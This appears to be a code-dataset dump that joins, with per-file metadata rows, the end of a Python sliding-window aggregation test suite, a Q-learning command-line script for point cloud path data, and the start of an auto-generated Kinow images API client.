{'col1': 3, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 4},
{'col1': 4, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 5},
{'col1': 5, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 5, 'number_of_stuff_count_3h': 6},
{'col1': 6, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 6},
{'col1': 7, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 7},
{'col1': 8, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 5},
{'col1': 9, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 6}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_roll_cached_buckets():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
SlidingWindows(['1h', '2h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_min_1h': 1, 'number_of_stuff_min_2h': 0,
'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_min_1h': 2, 'number_of_stuff_min_2h': 0,
'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1,
'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2,
'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3,
'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4,
'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5,
'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregation_unique_fields():
try:
build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator("number_of_stuff", "col1", ["count"],
SlidingWindows(['1h', '2h'], '15m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)), ]).run()
assert False
except TypeError:
pass
| 80.342733 | 139 | 0.628193 | 11,350 | 74,076 | 3.546608 | 0.015419 | 0.294728 | 0.230586 | 0.080116 | 0.968972 | 0.951185 | 0.945894 | 0.938416 | 0.93064 | 0.928504 | 0 | 0.09622 | 0.240415 | 74,076 | 921 | 140 | 80.429967 | 0.619191 | 0 | 0 | 0.736331 | 0 | 0 | 0.507303 | 0.461553 | 0 | 0 | 0 | 0 | 0.023086 | 1 | 0.025516 | false | 0.00243 | 0.006075 | 0 | 0.034022 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
d474aff6997180d3ba677233c457e563dbb2d77e | 14,191 | py | Python | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | import sys
import argh
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import scipy.io
import ipdb
import os
import util
import load_data
import su_2state as sarsa_util
import display
from RL_Config import *
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-s', '--sigma', help='Path reward sigma', default=5000)
def plot_path_rewards(points_file, path_pat, data_ids, config_dir, **extra):
"Run basic q-learning algorithm"
rl_config = RL_Config()
rl_config.set_parameters(
blocksize=extra['blocksize'])
rl_config.load_pointcloud(points_file)
rl_config.load_action_files(config_dir)
rl_config.load_path_data(path_pat, data_ids)
rl_config.format_grid_and_paths()
#display.plot_path_reward(rl_config.path_NN, rl_config.voxel_grid, extra['sigma'])
#plt.show()
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('-b', '--blocksize', default=0.5, help='Side length of grid cube')
@argh.arg('-s', '--start', default=0, help='Z level to begin plot at')
@argh.arg('-m', '--max_div', default=8, help='Divide max by this')
def show_denseplot(points_file, path_pat, data_ids, **extra):
"Generate and show pointclound density plot"
rl_config = RL_Config()
rl_config.set_parameters(blocksize=extra['blocksize'])
rl_config.load_pointcloud(points_file)
rl_config.load_path_data(path_pat, data_ids)
rl_config.format_grid_and_paths()
#display.show_grid(rl_config.voxel_grid, extra['start'], rl_config.person_column, extra['max_div'])
print(rl_config.person_column)
#plt.show()
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('-c', '--count', default=4000, help='Number of points to plot')
@argh.arg('-b', '--blocksize', default=0.5, help='Side length of grid cube')
def show_points_and_path(points_file, path_pat, data_ids, **extra):
"""
Loads points and path data files and plots them
"""
count = extra['count']
rl_config = RL_Config()
rl_config.set_parameters(blocksize=extra['blocksize'])
rl_config.load_pointcloud(points_file)
rl_config.load_path_data(path_pat, data_ids)
rl_config.format_grid_and_paths()
#display.make_basic_plot(rl_config, 0, ['b-', 'r-', 'g-'], count)
#plt.show()
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Iteration sample size', default=200)
@argh.arg('--state_functions', help='Functions specification',
default=['hc_only_make_sarsa_lists','hc_only_NN','hc_only_reward','hc_only_transition'], nargs='+', type=str)
def basic_qlearn(points_file, path_pat, data_ids, config_dir, **extra):
"Run basic q-learning algorithm"
num_iter = extra['iter']
memory_size = extra['memory_size']
training_paths = []
training_labels = []
rl_config = RL_Config()
rl_config.set_parameters(
alpha=extra['alpha'],
gamma=extra['gamma'],
blocksize=extra['blocksize'])
rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])
rl_config.load_pointcloud(points_file)
rl_config.load_action_files(config_dir)
rl_config.load_path_data(path_pat, data_ids)
rl_config.format_grid_and_paths()
rl_config.paths_to_SARSA(rl_config)
Q, vals = util.do_qlearn(rl_config, num_iter, memory_size)
print('Finished basic Q-Learn. Uncomment dsiplay commands to see result.')
#display.show_value(np.log(Q*1000+1), 13)
#display.plot_1D(vals)
#plt.show()
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Total memory size', default=200)
@argh.arg('-c', '--batch_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
@argh.arg('-e', '--epsilon', help='epsilon greedy parameter', default=0.9)
@argh.arg('--state_functions', help='Functions specification',
default=['hc_only_make_sarsa_lists','hc_only_NN','hc_only_reward','hc_only_transition'], nargs='+', type=str)
@argh.arg('--explore_functions', help='Functions specification',
default=['hc_only_reset','hc_only_explore_step'], nargs='+', type=str)
@argh.arg('-r', '--rewards',
help='Reward Values [Goal, Action Penalty, Wall Penalty, Path Reward]',
default=[100, 100, 50, 0], nargs='+', type=float)
@argh.arg('--save', default=None, help='Save configuration and results in directory')
def explore_qlearn(points_file, path_pat, data_ids, config_dir, **extra):
"Run basic q-learning algorithm"
num_iter = extra['iter']
memory_size = extra['memory_size']
batch_size = extra['batch_size']
episode_length = extra['elength']
rl_config = RL_Config()
rl_config.set_parameters(
alpha=extra['alpha'],
gamma=extra['gamma'],
epsilon=extra['epsilon'],
blocksize=extra['blocksize'],
rewards=extra['rewards'])
rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])
rl_config.get_random_state = getattr(sarsa_util, extra['explore_functions'][0])
rl_config.explore_step = getattr(sarsa_util, extra['explore_functions'][1])
rl_config.set_loadfiles(
fn_points=points_file,
fn_config=config_dir,
fnp_path=path_pat,
data_ids=data_ids)
savefolder = extra['save']
if savefolder is not None:
if not os.path.exists(savefolder):
os.makedirs(savefolder)
rl_config.save(savefolder)
summpath = os.path.join(savefolder, 'summary.txt')
f = open(summpath, 'wb')
summ = rl_config.get_summary()
summ += "num_iter = {0}\t\t\t// number of training iterations\n".format(num_iter)
summ += "batch_size = {0}\t\t\t//batch train size\n".format(batch_size)
summ += "memory_size = {0}\t\t\t//total memory size\n".format(memory_size)
summ += "episode_length = {0}\t\t\t//length of an episode\n".format(episode_length)
f.write(bytes(summ, 'UTF-8'))
f.close()
rl_config.load_data()
rl_config.format_grid_and_paths()
rl_config.paths_to_SARSA(rl_config)
(Q, vals, umap) = util.do_explore_qlearn(rl_config, num_iter=num_iter,
rand_count=batch_size, memory=memory_size, reset_episode=episode_length)
if savefolder is not None:
if not os.path.exists(savefolder):
os.makedirs(savefolder)
matpath = os.path.join(savefolder,'Q-results.mat')
scipy.io.savemat(matpath,
{'Q':Q, 'vals':vals, 'umap':umap, 'voxel_grid':rl_config.voxel_grid})
print('Saved in :' + savefolder)
print(rl_config.person_column)
@argh.arg('points_file',
help='File containing point cloud data as list of points')
@argh.arg('path_pat',
help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Total memory size', default=200)
@argh.arg('-c', '--batch_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
@argh.arg('-e', '--epsilon', help='epsilon greedy parameter', default=0.9)
@argh.arg('--state_functions', help='Functions specification',
default=['hc_only_make_sarsa_lists','hc_only_NN','hc_only_reward','hc_only_transition'], nargs='+', type=str)
@argh.arg('--explore_functions', help='Functions specification',
default=['hc_only_reset','hc_only_explore_step'], nargs='+', type=str)
@argh.arg('-r', '--rewards',
help='Reward Values [Goal, Action Penalty, Wall Penalty, Path Reward]',
default=[100, 100, 50, 0], nargs='+', type=float)
@argh.arg('--save', default=None, help='Save configuration and results in directory')
def save_processed_data(points_file, path_pat, data_ids, config_dir, **extra):
"Run basic q-learning algorithm"
num_iter = extra['iter']
memory_size = extra['memory_size']
batch_size = extra['batch_size']
episode_length = extra['elength']
rl_config = RL_Config()
rl_config.set_parameters(
alpha=extra['alpha'],
gamma=extra['gamma'],
epsilon=extra['epsilon'],
blocksize=extra['blocksize'],
rewards=extra['rewards'])
rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])
rl_config.get_random_state = getattr(sarsa_util, extra['explore_functions'][0])
rl_config.explore_step = getattr(sarsa_util, extra['explore_functions'][1])
rl_config.set_loadfiles(
fn_points=points_file,
fn_config=config_dir,
fnp_path=path_pat,
data_ids=data_ids)
savefolder = extra['save']
if savefolder is not None:
if not os.path.exists(savefolder):
os.makedirs(savefolder)
rl_config.save(savefolder)
summpath = os.path.join(savefolder, 'summary.txt')
f = open(summpath, 'wb')
summ = rl_config.get_summary()
summ += "config_dir = {0}\t\t\t//directory storing data config files\n".format(config_dir)
summ += "num_iter = {0}\t\t\t// number of training iterations\n".format(num_iter)
summ += "batch_size = {0}\t\t\t//batch train size\n".format(batch_size)
summ += "memory_size = {0}\t\t\t//total memory size\n".format(memory_size)
summ += "episode_length = {0}\t\t\t//length of an episode\n".format(episode_length)
f.write(bytes(summ, 'UTF-8'))
f.close()
rl_config.load_data()
rl_config.format_grid_and_paths()
rl_config.paths_to_SARSA(rl_config)
if savefolder is not None:
if not os.path.exists(savefolder):
os.makedirs(savefolder)
matpath = os.path.join(savefolder,'processed_data.mat')
scipy.io.savemat(matpath, {
'voxel_grid': rl_config.voxel_grid,
'SARSA_list': rl_config.total_SARSA_list,
'person_vector': rl_config.person_vector,
'config_dir': config_dir})
print('Saved in :' + savefolder)
print(rl_config.person_column)
@argh.arg('model', help='Folder containing the model files to load')
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
def load_qlearn(model, **extra):
num_iter = extra['iter']
memory_size = extra['memory_size']
episode_length = extra['elength']
rl_config = RL_Config.load(model)
rl_config.load_data()
rl_config.format_grid_and_paths()
rl_config.paths_to_SARSA(rl_config)
Qdict = scipy.io.loadmat(os.path.join(model,'Q-results.mat'))
Q = Qdict['Q']
vals = Qdict['vals']
umap = Qdict['umap']
Q[umap == 0] = -5
#display.show_value(Q, 1)
#display.plot_1D(vals.transpose())
#display.show_action_value(Q, 5, [0])
#display.show_action_value(Q, 6, [1])
#display.show_action_value(Q, 7, [2])
#display.show_value(umap, 22)
#plt.show()
if __name__ == "__main__":
np.set_printoptions(threshold=np.nan, linewidth=120)
argh.dispatch_commands([show_points_and_path, basic_qlearn, show_denseplot,
explore_qlearn, load_qlearn, plot_path_rewards, save_processed_data])
| 43.530675 | 117 | 0.677331 | 2,057 | 14,191 | 4.449684 | 0.114244 | 0.074293 | 0.027969 | 0.036709 | 0.840271 | 0.812411 | 0.80673 | 0.800393 | 0.800393 | 0.791435 | 0 | 0.013711 | 0.162286 | 14,191 | 325 | 118 | 43.664615 | 0.756225 | 0.053696 | 0 | 0.799242 | 0 | 0.022727 | 0.301526 | 0.015043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026515 | false | 0 | 0.049242 | 0 | 0.075758 | 0.026515 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4768978a8c05403748888093d5a31a45ab2aa0d | 92,671 | py | Python | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | 1 | 2019-06-26T14:24:54.000Z | 2019-06-26T14:24:54.000Z | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | null | null | null | kinow_client/apis/images_api.py | kinow-io/kinow-python-sdk | 4c1699a3c78048b84287bd049a669651a5b4e2d5 | [
"Apache-2.0"
] | 1 | 2018-02-01T10:08:40.000Z | 2018-02-01T10:08:40.000Z | # coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 1.4.58
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImagesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_actor_cover_image(self, actor_id, **kwargs):
"""
Get cover image of an actor
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_actor_cover_image(actor_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int actor_id: Actor ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_actor_cover_image_with_http_info(actor_id, **kwargs)
else:
(data) = self.get_actor_cover_image_with_http_info(actor_id, **kwargs)
return data
def get_actor_cover_image_with_http_info(self, actor_id, **kwargs):
"""
Get cover image of an actor
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_actor_cover_image_with_http_info(actor_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int actor_id: Actor ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['actor_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_actor_cover_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'actor_id' is set
if ('actor_id' not in params) or (params['actor_id'] is None):
raise ValueError("Missing the required parameter `actor_id` when calling `get_actor_cover_image`")
collection_formats = {}
resource_path = '/actors/{actor_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'actor_id' in params:
path_params['actor_id'] = params['actor_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_banner(self, category_id, **kwargs):
"""
Get Category cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_banner(category_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int category_id: Category ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_category_banner_with_http_info(category_id, **kwargs)
else:
(data) = self.get_category_banner_with_http_info(category_id, **kwargs)
return data
def get_category_banner_with_http_info(self, category_id, **kwargs):
"""
Get Category cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_banner_with_http_info(category_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int category_id: Category ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_banner" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params) or (params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_category_banner`")
collection_formats = {}
resource_path = '/categories/{category_id}/banner'.replace('{format}', 'json')
path_params = {}
if 'category_id' in params:
path_params['category_id'] = params['category_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_image_types(self, **kwargs):
"""
Get image types for categories
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_image_types(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[ImageType]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_category_image_types_with_http_info(**kwargs)
else:
(data) = self.get_category_image_types_with_http_info(**kwargs)
return data
def get_category_image_types_with_http_info(self, **kwargs):
"""
Get image types for categories
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_image_types_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[ImageType]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_image_types" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/categories/image-types'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ImageType]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_category_images(self, category_id, **kwargs):
"""
Get images attached to Category
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_images(category_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int category_id: Category ID to fetch (required)
:param str type: Filter on specific Image type
:param int page:
:param int per_page:
:return: CategoryImagesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_category_images_with_http_info(category_id, **kwargs)
else:
(data) = self.get_category_images_with_http_info(category_id, **kwargs)
return data
def get_category_images_with_http_info(self, category_id, **kwargs):
"""
Get images attached to Category
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_category_images_with_http_info(category_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int category_id: Category ID to fetch (required)
:param str type: Filter on specific Image type
:param int page:
:param int per_page:
:return: CategoryImagesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id', 'type', 'page', 'per_page']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_category_images" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params) or (params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_category_images`")
collection_formats = {}
resource_path = '/categories/{category_id}/images'.replace('{format}', 'json')
path_params = {}
if 'category_id' in params:
path_params['category_id'] = params['category_id']
query_params = {}
if 'type' in params:
query_params['type'] = params['type']
if 'page' in params:
query_params['page'] = params['page']
if 'per_page' in params:
query_params['per_page'] = params['per_page']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategoryImagesResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_director_cover_image(self, director_id, **kwargs):
"""
Get cover image of a director
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_director_cover_image(director_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int director_id: Director ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_director_cover_image_with_http_info(director_id, **kwargs)
else:
(data) = self.get_director_cover_image_with_http_info(director_id, **kwargs)
return data
def get_director_cover_image_with_http_info(self, director_id, **kwargs):
"""
Get cover image of a director
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
